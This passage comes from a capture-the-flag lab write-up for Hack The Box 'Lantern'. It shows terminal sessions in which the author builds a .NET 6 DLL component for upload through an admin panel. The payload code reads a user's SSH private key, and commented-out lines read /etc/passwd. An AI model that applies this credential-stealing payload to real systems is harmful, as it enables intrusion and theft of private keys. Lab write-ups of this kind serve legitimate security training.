Malicious DLL
As discovered previously;
- the admin panel supports several modules through loaded DLLs located under the
/opt/componentsdirectory - the file upload feature can be leveraged to upload a malicious DLL
In the following section, I will generate a malicious DLL file with the dotnet 6.0 framework
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ dotnet new classlib -n exploit
The template "Class Library" was created successfully.
Processing post-creation actions...
Running 'dotnet restore' on /home/kali/archive/htb/labs/lantern/exploit/exploit.csproj...
Determining projects to restore...
Restored /home/kali/archive/htb/labs/lantern/exploit/exploit.csproj (in 102 ms).
Restore succeeded.Creating a new project named; exploit
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ dotnet add exploit package Microsoft.AspNetCore.Components --version 6.0.0
Determining projects to restore...
Writing /tmp/tmpU7wcxb.tmp
info : X.509 certificate chain validation will use the fallback certificate bundle at '/usr/share/dotnet/sdk/6.0.400/trustedroots/codesignctl.pem'.
info : Adding PackageReference for package 'Microsoft.AspNetCore.Components' into project '/home/kali/archive/htb/labs/lantern/exploit/exploit.csproj'.
info : Restoring packages for /home/kali/archive/htb/labs/lantern/exploit/exploit.csproj...
info : Package 'Microsoft.AspNetCore.Components' is compatible with all the specified frameworks in project '/home/kali/archive/htb/labs/lantern/exploit/exploit.csproj'.
info : PackageReference for package 'Microsoft.AspNetCore.Components' version '6.0.0' added to file '/home/kali/archive/htb/labs/lantern/exploit/exploit.csproj'.
info : Generating MSBuild file /home/kali/archive/htb/labs/lantern/exploit/obj/exploit.csproj.nuget.g.targets.
info : Writing assets file to disk. Path: /home/kali/archive/htb/labs/lantern/exploit/obj/project.assets.json
log : Restored /home/kali/archive/htb/labs/lantern/exploit/exploit.csproj (in 104 ms).Appending the ASP.NET core component version 6.0 into the project
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ ll exploit
total 20K
4.0K drwxrwxr-x 2 kali kali 4.0K Aug 19 18:30 obj
4.0K -rw-rw-r-- 1 kali kali 330 Aug 19 18:30 exploit.csproj
4.0K drwxrwxr-x 3 kali kali 4.0K Aug 19 18:30 .
4.0K -rw-rw-r-- 1 kali kali 52 Aug 19 18:30 Class1.cs
4.0K drwxrwxr-x 4 kali kali 4.0K Aug 19 18:30 ..The payload will go into the Class1.cs file
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
using System.IO;
namespace exploit
{
public class Component: ComponentBase {
protected override void BuildRenderTree(RenderTreeBuilder builder) {
base.BuildRenderTree(builder);
//string file = File.ReadAllText("/etc/passwd");
//string file = File.ReadAllText("/home/tomas/user.txt");
string file = File.ReadAllText("/home/tomas/.ssh/id_rsa");
builder.AddContent(0, file);
}
}
}This will read the SSH private key of the tomas user
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ dotnet build exploit -c Release
MSBuild version 17.3.0+92e077650 for .NET
Determining projects to restore...
All projects are up-to-date for restore.
exploit -> /home/kali/archive/htb/labs/lantern/exploit/bin/Release/net6.0/exploit.dll
Build succeeded.
0 Warning(s)
0 Error(s)
Time Elapsed 00:00:01.75Build complete Payload is now ready for deployment